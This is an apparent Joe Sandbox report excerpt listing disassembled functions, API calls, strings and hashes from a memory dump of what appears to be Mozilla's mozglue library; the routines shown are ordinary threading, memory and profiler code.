Instruction ID: 6bc8317d773f35f2ebed73b3d23099ed1cac1f80457f094e6b6164ab62740de1
Opcode Fuzzy Hash: 255ad444357ee1c9886f016a4a247e9f78674871fcfdc43ff92a669d9f1e398f
Instruction Fuzzy Hash: 1D014F727042059BDF80DF16EC4CA077BB8EBAB3297254235EC1AE2290EB319814DF81

Function 6C2B7620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C2B75C4,?), ref: 6C2B762B

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C2B74D7,6C2C15FC,?,?,?), ref: 6C2B7644
GetCurrentThreadId.KERNEL32 ref: 6C2B765A
AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C2B74D7,6C2C15FC,?,?,?), ref: 6C2B7663
ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C2B74D7,6C2C15FC,?,?,?), ref: 6C2B7677

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
String ID:
API String ID: 418114769-0
Opcode ID: f2d78ae40b464988af1505ca71bdc0e446f204d54852064ad448689dd80e79c2
Instruction ID: 41fd32f2feddb544bd25396e4a55ff7a6748d3a401a59ef0dd6de1f653e5c215
Opcode Fuzzy Hash: f2d78ae40b464988af1505ca71bdc0e446f204d54852064ad448689dd80e79c2
Instruction Fuzzy Hash: 6EF0AF75E10746ABD7008F22C888676B778FFEA259F214316FD0452641E7B0A5D0CBD0

Function 6C2C1700 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 6C2C1800

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

Part of subcall function 6C264290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2A3EBD,6C2A3EBD,00000000), ref: 6C2642A9

Strings

name, xrefs: 6C2C1939
{marker.name} - {marker.data.name}, xrefs: 6C2C18C7
Details, xrefs: 6C2C1925

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Process$CurrentInit_thread_footerTerminatestrlen
String ID: Details$name${marker.name} - {marker.data.name}
API String ID: 46770647-1733325692
Opcode ID: 9ee27910892b55b2eb4cbca074bfd7a2b2718bcee83f8b8706d7caae2c47f48f
Instruction ID: c37ae0a0d74875a9cb07a0c9088f5617e54d5dc499a8cdcb2d9dd417e41073b9
Opcode Fuzzy Hash: 9ee27910892b55b2eb4cbca074bfd7a2b2718bcee83f8b8706d7caae2c47f48f
Instruction Fuzzy Hash: 9A7114B0A0070A9FD704CF29D4947AABBB1FF89304F444669DC155BB81DB70E698CBE2

Function 6C2CB0C0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,6C2CB0A6,6C2CB0A6,?,6C2CAF67,?,00000010,?,6C2CAF67,?,00000010,00000000,?,?,6C2CAB1F), ref: 6C2CB1F2
?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6C2CB0A6,6C2CB0A6,?,6C2CAF67,?,00000010,?,6C2CAF67,?,00000010,00000000,?), ref: 6C2CB1FF
free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6C2CB0A6,6C2CB0A6,?,6C2CAF67,?,00000010,?,6C2CAF67,?,00000010), ref: 6C2CB25F

Strings

map/set<T> too long, xrefs: 6C2CB1FA

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$Xlength_error@std@@
String ID: map/set<T> too long
API String ID: 1922495194-1285458680
Opcode ID: 18bb0f4c72023a870dd1382cbf3bc5c7667fd1133937622de51d2dd45d957b20
Instruction ID: 2e5b8f47c5b7ed9a27eba85a2ab97e295becf82b2fd3ee0afb07947edfe17b05
Opcode Fuzzy Hash: 18bb0f4c72023a870dd1382cbf3bc5c7667fd1133937622de51d2dd45d957b20
Instruction Fuzzy Hash: F3615A7470424A8FD741CF19C880A9ABBE1FF4A318F18C699EC599BB52C771EC45CB92

Function 6C28D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C29CBE8: GetCurrentProcess.KERNEL32(?,6C2631A7), ref: 6C29CBF1
Part of subcall function 6C29CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C2631A7), ref: 6C29CBFA

EnterCriticalSection.KERNEL32(6C2EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D4F2
LeaveCriticalSection.KERNEL32(6C2EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D50B

Part of subcall function 6C26CFE0: EnterCriticalSection.KERNEL32(6C2EE784), ref: 6C26CFF6
Part of subcall function 6C26CFE0: LeaveCriticalSection.KERNEL32(6C2EE784), ref: 6C26D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D52E
EnterCriticalSection.KERNEL32(6C2EE7DC), ref: 6C28D690
LeaveCriticalSection.KERNEL32(6C2EE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6C29D1C5), ref: 6C28D751

Strings

MOZ_CRASH(), xrefs: 6C28D4BB

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 687e4806d1bfe68064ebd8e0d3bfc7893d9396d41161cbdf1b5b72bd975c8909
Instruction ID: c118fb6bca0ffa12891cd5461a7968adb5146005dd3917914be898fc7d35aa52
Opcode Fuzzy Hash: 687e4806d1bfe68064ebd8e0d3bfc7893d9396d41161cbdf1b5b72bd975c8909
Instruction Fuzzy Hash: 1A51E171A0470A8FD768CF29C09471AB7E1EB8D704F55892EED9AD7B84D770A808CB81

Function 6C2B4630 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C2B4721

Strings

profiler-paused, xrefs: 6C2B46E4
., xrefs: 6C2B476A
-%llu, xrefs: 6C2B4733

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: __aulldiv
String ID: -%llu$.$profiler-paused
API String ID: 3732870572-2661126502
Opcode ID: 40e220a6418b023d317d2f3dc1b76cb8e226cb21607ee7eaf32b57642f9b56fb
Instruction ID: 7aa9c50d57f300bb45f75fd1deee1adbebaf4b708c7a208e84fa49a1c3350b8f
Opcode Fuzzy Hash: 40e220a6418b023d317d2f3dc1b76cb8e226cb21607ee7eaf32b57642f9b56fb
Instruction Fuzzy Hash: 73413471E0470D9BCB08DF79E89115ABBE5AB85788F10862DFC55A7B81EB309844CB91

Function 6C2D9830 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C2D985D
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C2D987D
MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C2D98DE

Strings

ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C2D98D9

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: Printf$Target@mozilla@@$?vprint@Crash
String ID: ElementAt(aIndex = %zu, aLength = %zu)
API String ID: 1778083764-3290996778
Opcode ID: 6ff2d21dfaccb7fa2fafb8b657a7901a8e519108c18c6ff18af2c1a6ae6ad777
Instruction ID: 8b978361c912276d26fef130157a812b8f0049b517987c65ae0a3fe06b259caa
Opcode Fuzzy Hash: 6ff2d21dfaccb7fa2fafb8b657a7901a8e519108c18c6ff18af2c1a6ae6ad777
Instruction Fuzzy Hash: D4310871A0010C6BDB14AF5ADC545EFB7A9DF49718F50442DEE1AEBB40CB316904CBE1

Function 6C2B46E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C2B4721

Part of subcall function 6C264410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C2A3EBD,00000017,?,00000000,?,6C2A3EBD,?,?,6C2642D2), ref: 6C264444

Strings

profiler-paused, xrefs: 6C2B46E4
., xrefs: 6C2B476A
-%llu, xrefs: 6C2B4733

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: __aulldiv__stdio_common_vsprintf
String ID: -%llu$.$profiler-paused
API String ID: 680628322-2661126502
Opcode ID: 935b6381ed8f8b2f8ba0c8ed41acb4bd4444027617d4d37f0b4f15f2f4d62f8c
Instruction ID: 7ba4e20be4585bd1b7ca2ecf5d3877264387a198ef2d3d6bfc31811b5c446d9c
Opcode Fuzzy Hash: 935b6381ed8f8b2f8ba0c8ed41acb4bd4444027617d4d37f0b4f15f2f4d62f8c
Instruction Fuzzy Hash: 06312871F0420C5BDB08CF6DD89169EBBE69B89318F15853DEC05ABB81EB709904CB90

Function 6C2BB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C264290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C2A3EBD,6C2A3EBD,00000000), ref: 6C2642A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C2BB127), ref: 6C2BB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C2BB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C2BB4E4

Strings

pid:, xrefs: 6C2BB4DE

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: 0efab3843b3edab229d8cd41035910405d1e97f1c6b9bac8ff150f98afebcbab
Instruction ID: 65765e609b794b65030424bdf0da271e839a22a3aad2c35e36f5ceadf140baab
Opcode Fuzzy Hash: 0efab3843b3edab229d8cd41035910405d1e97f1c6b9bac8ff150f98afebcbab
Instruction Fuzzy Hash: 2C312031A0120D9BDB10DFA9C894AEEF7B5BF0934CF540529EC01B7A41D7B1A889CBA1

Function 6C27BF00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C2C7A3F), ref: 6C27BF11
?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C2C7A3F), ref: 6C27BF5D
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C2C7A3F), ref: 6C27BF7E

Strings

-l, xrefs: 6C27BF84

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
String ID: -l
API String ID: 4279176481-4032016520
Opcode ID: 2837df800d2c1df7bf01e29ffb44ff62a4b739c905241120976a6a032a332def
Instruction ID: 0830bd869498561ce48bbd0a7960b4f870ab8769768fb3bb739234bf3ee3e55f
Opcode Fuzzy Hash: 2837df800d2c1df7bf01e29ffb44ff62a4b739c905241120976a6a032a332def
Instruction Fuzzy Hash: 9011BF792007088FC729CF1CD599A26FBF8FB59305716885DE98A9B760C731B800CF94

Function 6C26F100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shell32,?,6C2DD020), ref: 6C26F122
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C26F132

Strings

SHGetKnownFolderPath, xrefs: 6C26F12C
shell32, xrefs: 6C26F11D

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetKnownFolderPath$shell32
API String ID: 2574300362-1045111711
Opcode ID: ba138ed02bb119cbda95cbe85766dfec7870bdc375cabf228ce430e68c8ac908
Instruction ID: 06a26102391688e18c626c4afb14c316c444376d68db9d97adb7e2029d8ec8d4
Opcode Fuzzy Hash: ba138ed02bb119cbda95cbe85766dfec7870bdc375cabf228ce430e68c8ac908
Instruction Fuzzy Hash: D5015E7170021A9BCF50CF6ADC58A6B7BB8FF4A795B500428FC49E7680DB30A940CBA0

Function 6C2AE550 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C2AE577
AcquireSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AE584
ReleaseSRWLockExclusive.KERNEL32(6C2EF4B8), ref: 6C2AE5DE
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C2AE8A6

Strings

MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C2AE655
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C2AE722, 6C2AE750, 6C2AE7A2
MOZ_PROFILER_STARTUP, xrefs: 6C2AE5A1, 6C2AE5CC, 6C2AE5FF, 6C2AE62A
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C2AE826, 6C2AE850
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C2AE777

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
API String ID: 1483687287-53385798
Opcode ID: cfb92bd6976298127439d21fe05234880c97a3438e676ae8e29890c0c41c9a7e
Instruction ID: 5a4aa42078d94ff0221eb3a349175de61df9783967d6e42c4055e3a897eae7d4
Opcode Fuzzy Hash: cfb92bd6976298127439d21fe05234880c97a3438e676ae8e29890c0c41c9a7e
Instruction Fuzzy Hash: 6B11ED36A00348DFCB009F15D84CA6ABBB4FBCE328F800A19FD4167690C7B0A806CB95

Function 6C2B0C90 Relevance: 6.3, APIs: 5, Instructions: 99stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2B0CD5

Part of subcall function 6C29F960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C29F9A7

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C2B0D40
free.MOZGLUE ref: 6C2B0DCB

Part of subcall function 6C285E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C285EDB
Part of subcall function 6C285E90: memset.VCRUNTIME140(ew,l,000000E5,?), ref: 6C285F27
Part of subcall function 6C285E90: LeaveCriticalSection.KERNEL32(?), ref: 6C285FB2

free.MOZGLUE ref: 6C2B0DDD
free.MOZGLUE ref: 6C2B0DF2

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
String ID:
API String ID: 4069420150-0
Opcode ID: 7c0bd1a57b888c544f85891c6f231e2ee17981cf055b9771ab5222241bd76c13
Instruction ID: b840fd5c9cc03c9e644e4681060a82aa3c6d4f191bdc843d2786247ce00e5d16
Opcode Fuzzy Hash: 7c0bd1a57b888c544f85891c6f231e2ee17981cf055b9771ab5222241bd76c13
Instruction Fuzzy Hash: DF4147B59087898BD320CF29C18079AFBE1FFC9758F118A2EE8D897750D770A444CB92

Function 6C2B9120 Relevance: 6.3, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C2B8242,?,00000000,?,6C2AB63F), ref: 6C2B9188
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C2B8242,?,00000000,?,6C2AB63F), ref: 6C2B91BB
memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6C2B8242,?,00000000,?,6C2AB63F), ref: 6C2B91EB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C2B8242,?,00000000,?,6C2AB63F), ref: 6C2B9200
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C2B8242,?,00000000,?,6C2AB63F), ref: 6C2B9219

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 6f07a85489ab1611149d5241a61f0f9a9370104d58eeb428f0d08128ef76bcf2
Instruction ID: f08034fa1d004775a8e6accfd046b09cc52ba1b11793484725991fbbc120b26e
Opcode Fuzzy Hash: 6f07a85489ab1611149d5241a61f0f9a9370104d58eeb428f0d08128ef76bcf2
Instruction Fuzzy Hash: 92314631A10A098FEF00EF6CDC4475A77B9EF91359F518629DC5AE7640EB30D424CBA1

Function 6C2A0800 Relevance: 6.3, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C2EE7DC), ref: 6C2A0838
memset.VCRUNTIME140(?,00000000,00000158), ref: 6C2A084C
EnterCriticalSection.KERNEL32(?), ref: 6C2A08AF
LeaveCriticalSection.KERNEL32(?), ref: 6C2A08BD
LeaveCriticalSection.KERNEL32(6C2EE7DC), ref: 6C2A08D5

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3464557798.000000006C2EE000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3466903193.000000006C2F2000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c260000_build_2024-07-25_20-56.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset
String ID:
API String ID: 837921583-0
Opcode ID: 226c4710bbdabd47e9ca32824055f61925ad44da513fad65a3a7d5881356d847
Instruction ID: 3bf94bc3c83503feb5e12b93667caf1a8215a4b87878d740ef433b58b7a4cea1
Opcode Fuzzy Hash: 226c4710bbdabd47e9ca32824055f61925ad44da513fad65a3a7d5881356d847
Instruction Fuzzy Hash: CB21A43170134E9FEB44CFA5D848BAE7375AF49709F540528ED0AB7680DB31A405CBD4

Function 6C2BCCF0 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C2ADA31,00100000,?,?,00000000,?), ref: 6C2BCDA4

Part of subcall function 6C27CA10: malloc.MOZGLUE(?), ref: 6C27CA26

Part of subcall function 6C2BD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C2BCDBA,00100000,?,00000000,?,6C2ADA31,00100000,?,?,00000000,?), ref: 6C2BD158
Part of subcall function 6C2BD130: InitializeConditionVariable.KERNEL32(00000098,?,6C2BCDBA,00100000,?,00000000,?,6C2ADA31,00100000,?,?,00000000,?), ref: 6C2BD177

?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C2ADA31,00100000,?,?,00000000,?), ref: 6C2BCDC4

Part of subcall function 6C2B7480: ReleaseSRWLockExclusive.KERNEL32(?,6C2C15FC,?,?,?,?,6C2C15FC,?), ref: 6C2B74EB

moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C2ADA31,00100000,?,?,00000000,?), ref: 6C2BCECC

Part of subcall function 6C27CA10: mozalloc_abort.MOZGLUE(?), ref: 6C27CAA2

Part of subcall function 6C2ACB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C2BCEEA,?,?,?,?,00000000,?,6C2ADA31,00100000,?,?,00000000), ref: 6C2ACB57
Part of subcall function 6C2ACB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C2ACBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C2BCEEA,?,?), ref: 6C2ACBAF

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C2ADA31,00100000,?,?,00000000,?), ref: 6C2BD058

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

Associated: 0000000A.00000002.3454561964.000000006C260000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000A.00000002.3461746311.000000006C2DD000.00000002.00000001.01000000.0000000C.sdmpDownload File
